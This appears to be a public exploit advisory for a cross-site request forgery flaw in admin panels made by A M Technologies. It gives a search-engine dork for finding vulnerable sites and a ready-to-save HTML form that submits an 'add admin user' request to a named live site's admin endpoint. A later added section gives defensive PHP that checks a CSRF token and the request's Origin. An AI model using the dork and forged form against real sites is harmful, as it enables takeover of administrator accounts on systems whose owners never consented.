====================================================================================================================================
| # Title : A M Technologies CSRF Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : Windows 10 French V.(Pro) |
| # Vendor : http://www.amtechnologies.in/ |
| # Dork : intext:"Powered by A M Technologies" inurl:php?id= |
====================================================================================================================================
PoC :
[+] Dorking in Google or other search engine
[+] Save as poc.html
<div class="box box-color box-bordered">
<div class="box-title">
<h3><i class="icon-th-list"></i>Add User Detail</h3>
</div>
<div class="box-content nopadding">
<form action="http://www.rishtasaatpheroka.com/admin/codeAdminUser.php?action=add" method="POST" class="form-horizontal form-validate form-bordered" enctype="multipart/form-data" name="frmUpdateUser" id="frmUpdateUser" novalidate="novalidate">
<input name="page" id="page" value="" type="hidden">
<div class="control-group">
<label for="autocom" class="control-label">Admin Name</label>
<div class="controls">
<input name="txtAdminName" id="txtAdminName" data-provide="typeahead" data-items="4" data-rule-required="true" value="" type="text">
</div>
</div>
<div class="control-group">
<label for="autocom" class="control-label">User Type</label>
<div class="controls">
<select name="txtAdminType" id="txtAdminType">
<option value="">-Select Type--</option>
<option value="Admin">Admin</option> <option value="User">User</option>
</select>
</div>
</div>
<div class="control-group">
<label for="textfield" class="control-label">Username availability</label>
<div class="controls">
<div class="input-append">
<input name="txtUserName" id="txtUserName" class="username-check" value="" onblur="checkUser()" type="text">
<a href="javascript:checkUser()" class="btn add-on"><i class="icon-refresh"></i></a>
</div>
<div id="replaceme">Please enter a username</div>
</div>
</div>
<div class="control-group">
<label for="textfield" class="control-label">Password strength</label>
<div class="controls">
<div class="input-xlarge">
<input name="txtPassword" id="txtPassword" class="complexify-me input-block-level" value="" type="password">
<span class="help-block">
<div class="progress progress-info">
<div class="bar bar-red" style="width: 0%"></div>
</div>
</span>
</div>
</div>
</div>
<div class="control-group">
<label for="textfield" class="control-label">Email</label>
<div class="controls">
<div class="input-prepend">
<span class="add-on">@</span>
<input name="txtEmail" id="txtEmail" placeholder="Email" value="" type="text">
</div>
</div>
</div>
<div class="control-group">
<label for="textfield" class="control-label">Joined Date</label>
<div class="controls">
<div class="input-prepend">
<input name="txtDate" id="txtDate" class="input-medium datepick" value="05-06-2018" type="text">
</div>
</div>
</div>
<div class="form-actions">
<input name="btnAdd" id="btnAdd" value="Submit" class="btn btn-primary" type="submit"> <button type="button" class="btn">Cancel</button>
</div>
</form>
</div>
</div>
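
A server-side check that rejects the cross-site form above, given as an added example (not the vendor's code and not part of the original advisory): the handler behind codeAdminUser.php?action=add would call csrf_verify() before creating a user. The function names, the csrf_token field and the example.test origins are assumptions; the requests at the bottom are constructed.

```php
<?php
// Added example, not the vendor's code. Function names and the
// 'csrf_token' field are assumptions; only the form field names and
// the action=add endpoint come from the PoC above.

const EXPECTED_ORIGIN = 'https://admin.example.test'; // placeholder origin

// Create (once per session) the secret that the admin form must echo back.
function csrf_issue_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept a state-changing request only if it is a POST, its Origin (when
// the browser sends one) is ours, and the token matches the session's.
function csrf_verify(array $session, array $post, array $server): bool {
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== EXPECTED_ORIGIN) {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($supplied) && $expected !== ''
        && hash_equals($expected, $supplied);
}

// Constructed requests: the first mirrors the PoC form (no token, foreign
// origin); the second is the genuine admin page submitting its own form.
$session = [];
$token   = csrf_issue_token($session);
$fields  = ['txtAdminName' => 'x', 'txtAdminType' => 'User', 'btnAdd' => 'Submit'];

$crossSite = csrf_verify($session, $fields,
    ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'https://other.example.test']);
$sameSite  = csrf_verify($session, $fields + ['csrf_token' => $token],
    ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => EXPECTED_ORIGIN]);

var_dump($crossSite, $sameSite);
```

In a real handler the three arguments would be $_SESSION, $_POST and $_SERVER, and the token from csrf_issue_token() would be written into the admin form as a hidden csrf_token input.
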
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
|
=======================================================================================================================================